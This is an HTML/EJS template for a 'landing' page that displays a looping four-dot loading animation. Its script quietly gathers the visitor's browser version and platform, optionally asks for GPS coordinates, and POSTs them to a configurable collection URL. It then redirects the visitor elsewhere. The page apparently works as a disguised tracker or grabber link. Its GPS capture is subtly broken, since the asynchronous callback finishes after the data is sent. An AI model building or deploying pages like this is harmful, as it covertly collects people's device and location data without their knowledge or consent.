

<!DOCTYPE html>
<html lang="fr">
    <head>
        <meta charset="utf-8" />
        <style>

.load
{

  position: absolute;
  top: 50%;
  left:50%;
  transform: translate(-50%, -50%);
  display: block;
  width: 200px;
  height: 200px;

}


.rond
{
  display: block;
  border-radius: 50%;
  height: 50px;
  width: 50px;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%,-50%);

}

.rond:nth-child(1)
{
  background-color:#19A68C;
  transform: translate(25% , -125%);
  animation: loader 2s ease infinite;
}

.rond:nth-child(2)
{
  background-color: #F63D3A;
  transform: translate(25% , 25%);
  animation: loader 2s -1500ms ease infinite;
}

.rond:nth-child(3)
{
  background-color: #FDA543;
  transform: translate(-125% , 25%);
  animation: loader 2s -1s ease infinite;
}

.rond:nth-child(4)
{
  background-color: #193B48;
  transform: translate(-125% , -125%);
  animation: loader 2s -2500ms ease infinite;
}





@keyframes loader
{

  0%
  {
    transform: translate(25% , -125%);
  }

  25%
  {
    transform: translate(25% , 25%);
  }


  50%
  {
    transform: translate(-125% , 25%);
  }

  75%
  {
    transform: translate(-125% , -125%);
  }

  100%
  {
    transform: translate(25% , -125%);
  }




}

        </style>
        <title>landing</title>
    </head>

    <body>
        <div class="load">
            <div class="rond"></div>
            <div class="rond"></div>
            <div class="rond"></div>
            <div class="rond"></div>
        </div>

        <script>
  

//EJS VALUE =>

let redirect = "<%-redirect %>"
let sendLinks= "<%- sendLinks %>"
let time     = Number("<%- time %>")
let options  = JSON.parse('<%- JSON.stringify(options) %>')

console.log(options)

function pushToUrl(informations, url)
{
    let options =
    {
        method: "POST",
        headers: {
            "content-type": "application/json",
        },
        body: JSON.stringify(informations)
    }

    console.log(options)

    fetch(url, options)
}


function redirectToUrl(url, time)
{
    setTimeout(()=>{
        window.location.replace(url)
    }, time)
}

function getInformation(options)
{
  let informations = {
    navigator: window.navigator.appVersion,
    os: window.navigator.platform,
  }

  if(options.gps && navigator.geolocation)
  {
    navigator.geolocation.getCurrentPosition((pos)=>{
      informations.gps = pos.coords
    })
  }

  return informations
}

function app()
{
    let informations = getInformation(options)
    
    pushToUrl(informations, sendLinks)
    redirectToUrl(redirect, time)
}


app()




/*





///////////////////////////////////////

////possibilité ??? a check merci => 
//https://developer.mozilla.org/fr/docs/Web/API/Window
//https://www.w3schools.com/js/js_window.asp


//https://developer.mozilla.org/fr/docs/Web/API/Window/navigator



*/

        </script>

    </body>
</html>
